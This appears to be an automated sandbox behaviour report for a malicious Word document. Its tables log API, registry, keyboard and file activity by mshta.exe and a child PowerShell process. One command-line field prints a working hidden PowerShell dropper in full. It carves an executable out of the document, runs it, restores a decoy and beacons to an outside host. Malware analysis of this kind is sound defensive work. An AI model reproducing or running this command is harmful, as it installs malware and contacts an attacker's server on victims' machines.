| Get Address | c:\windows\system32\advapi32.dll | function = EventUnregister, address_out = 0x77823c80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = RegisterApplicationRestart, address_out = 0x7775f510 |
|
1 | |
| Get Address | c:\windows\system32\mshtml.dll | function = RunHTMLApplication, address_out = 0x7fee0ad5b90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeSRWLock, address_out = 0x778384f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = AcquireSRWLockExclusive, address_out = 0x77828020 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = AcquireSRWLockShared, address_out = 0x778254e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReleaseSRWLockExclusive, address_out = 0x77828050 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReleaseSRWLockShared, address_out = 0x778254b0 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 6, address_out = 0x7fefde71320 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 7, address_out = 0x7fefde71020 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 8, address_out = 0x7fefde713f0 |
|
1 | |
| Get Address | c:\windows\system32\oleacc.dll | function = LresultFromObject, address_out = 0x7fef22f3aa8 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x7fefe1e7490 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 2, address_out = 0x7fefde73480 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CLSIDFromProgIDEx, address_out = 0x7fefe1da4c4 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoGetClassObject, address_out = 0x7fefe1f2e18 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = ShellExecuteExW, address_out = 0x7fefe877c70 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = VariantClear, address_out = 0x7fefde71180 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetUnlockRequestFile, address_out = 0x7feff5f70f4 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 16 |
|
1 | |
| Map | - | process_name = c:\windows\system32\mshta.exe, desired_access = FILE_MAP_WRITE |
|
1 |
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Create | - | class_name = HTML Application Host Window Class, wndproc_parameter = 8791278233248 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 2676624 |
|
1 | |
| Set Attribute | - | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
2 | |
| Set Attribute | - | class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = KB_LOCALE_ID |
|
2 | |
| Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
23 | |
| Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
23 | |
| Read | virtual_key_code = VK_MENU, result_out = 0 |
|
23 | |
| Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
13 | |
| Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
13 | |
| Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
13 | |
| Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
5 | |
| Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
5 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 724, y_out = 422 |
|
3 | |
| Get Cursor | x_out = 687, y_out = 514 |
|
2 | |
| Get Cursor | x_out = 631, y_out = 286 |
|
8 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
4 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
2 | |
| Sleep | duration = -1 (infinite) |
|
9 | |
| Get Time | type = System Time, time = 2017-10-24 17:38:03 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 131290 |
|
1 | |
| Get Time | type = Ticks, time = 131415 |
|
1 | |
| Get Time | type = Ticks, time = 131992 |
|
121 | |
| Get Time | type = Ticks, time = 132008 |
|
66 | |
| Get Time | type = Ticks, time = 132117 |
|
3 | |
| Get Time | type = System Time, time = 2017-10-24 17:38:04 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 132148 |
|
1 | |
| Get Time | type = Ticks, time = 147670 |
|
1 | |
| Get Time | type = Ticks, time = 147686 |
|
2 | |
| Get Time | type = Ticks, time = 147701 |
|
1 | |
| Get Time | type = Ticks, time = 147764 |
|
2 | |
| Get Info | type = Operating System |
|
7 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | - |
|
3 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Local\!PrivacIE!SharedMemory!Mutex |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 |
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:29 |
| Information | Value |
|---|---|
| PID | 0x664 |
| Parent PID | 0xbc8 (c:\windows\system32\mshta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
768
0x
610
0x
A18
0x
A08
0x
99C
0x
998
0x
94C
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\result.exex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | - | type = file_type |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
9 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
7 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | - | size = 4096, size_out = 4096 |
|
50 | |
| Read | - | size = 4096, size_out = 3315 |
|
1 | |
| Read | - | size = 781, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 0 |
|
3 | |
| Read | - | size = 4096, size_out = 436 |
|
1 | |
| Read | - | size = 4096, size_out = 2530 |
|
1 | |
| Read | - | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
73 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 281 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
